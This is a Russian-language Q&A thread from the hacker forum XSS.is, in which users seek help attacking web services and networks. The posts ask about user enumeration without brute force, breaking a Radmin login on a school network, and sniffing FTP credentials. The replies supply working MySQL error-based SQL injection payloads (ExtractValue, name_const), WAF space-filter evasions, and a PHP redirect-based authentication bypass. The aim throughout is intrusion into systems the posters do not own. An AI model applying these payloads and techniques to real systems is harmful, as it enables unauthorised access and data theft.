• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Приветствую! Подскажите, как я могу достать username сервисов ssh, telnet, ftp, mssql, postgresql, pop3 без использования брута по словарям? Допустим для smtp знаю есть скрипт nse для nmap smtp-enum-users.nse. Есть способы также реализовать user enumeration без брута для прочих перечисленных сервисов? Подскажите, где могу покопаться?

Пожалуйста, обратите внимание, что пользователь заблокирован
[QUOTE = "ar4ayo, post: 89262, member: 7334"]
there is a radmin on the server! Is it possible to somehow bypass / break login and password? can I get for example in the school network?
[/ QUOTE]

Y

Здравствуйте, Уважаемые форумчане!
При работе софта AppSpider очень большой процент нахождения линков с пометкой NoSQl.
Если полученную инфу подставлять в sqlmap то как правило ничего не крутит.
Пробовал с гитхаба https://github.com/codingo/NoSQLMap тоже глухо.
Так вот вопрос - как и главное чем раскрутить данный вид уязвимости и есть ли возможность автоматизации?

Как скулмапом раскрутить такую скуль?
site.com/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
site.com/1'or(ExtractValue(1,concat(0x3a,(select/**/2/**/from/**/),(user()))))--'
site.com/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES),(user()))))--'
Не крутит.
Фильтруется пробел space2comment не помогает.
Выкидывает 403 страницу. Хотя руками все норм.

Последнее редактирование:
Как скулмапом раскрутить такую скуль?
site.com/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
site.com/1'or(ExtractValue(1,concat(0x3a,(select/**/2/**/from/**/),(user()))))--'
site.com/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES),(user()))))--'
Не крутит.
Фильтруется пробел space2comment не помогает.
Выкидывает 403 страницу. Хотя руками все норм.
Если это ErrorBased, то проще руками раскрутить.
Варианты пробелов: %20, +, %09 ,%0а, %0b, %0с, %0d, /**/, %2B, (1)
Вектор ExtractValue вообще не нуждается в пробелах: extractvalue(1,concat(0x3b,(select(count(*))from(table)where(id=1))))
Хотя уверен, что проблема там не в пробелах.

Поп-Хлоп, можешь рассказать, что за трюк с редиректом при basic auth? ты как-то упоминал про него. может на рдоте была тема с обсуждением, но по-видимому я её прощёлкал :(

Поп-Хлоп, можешь рассказать, что за трюк с редиректом при basic auth? ты как-то упоминал про него. может на рдоте была тема с обсуждением, но по-видимому я её прощёлкал :(
Есть одна довольна смешная фитча, но не базик аутх. Если дашь слыь на комент мб подскажу.

Было бы тоже интересно узнать про basic авториз, точнее, что конкретно имеется ввиду )))

Эмм, по моему речь была про кривую авторизацию, типа:
Код:
if(!$loggedin){
header('Location: someotherpage.php')
}
Соответственно, при такой проверке не сложно проигнорировать заголовок с редиректом и остаться залогиненным. В свое время этим страдали очень многие админки ботнетов.

всем сап
тема такая, знаю, что FTP это очень дырявая штука и даже если сервер защищен, то логин/пас передается в открытом виде через запрос. Вопрос такой, как поймать запрос и вынуть оттуда логин/пас

Эмм, по моему речь была про кривую авторизацию, типа:
Код:
if(!$loggedin){
header('Location: someotherpage.php')
}
Соответственно, при такой проверке не сложно проигнорировать заголовок с редиректом и остаться залогиненным. В свое время этим страдали очень многие админки ботнетов.
Это классика. Если у бурпе такое проверять, то можно вообще прозевать этот момент. А так есть плагин NoRedirect. Кстати, штук 6 таких сайтов видел.

всем сап
тема такая, знаю, что FTP это очень дырявая штука и даже если сервер защищен, то логин/пас передается в открытом виде через запрос. Вопрос такой, как поймать запрос и вынуть оттуда логин/пас
Снифирить трафик

Здравствуйте, уважаемые форумчане. Нашёл дырку в сайте, при вводе sha-1 хэша можно получить доступ к аккаунту.
Как можно этим воспользоваться?
Стоит ли писать свой собственный хэш , по типу брута,который будет выдавать рандом хэши и пытаться зайти или это пустая трата времени?
Благодарю за внимание.

Приветствую, недавно пришёл на ваш форум и решил что стоило бы научиться находить/раскручивать уязвимости в web приложениях, серверах и т.п, но, к сожалению, я полный ноль в этой теме(максимум что делал это SqlDumper-ом крякнутым пользовался года три назад) и хочу спросить, с чего начать мое обучение? Может есть какие-то пошаговые гайды?(Было бы замечательно если бы вы дали на них ссылку) Заранее спасибо!

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх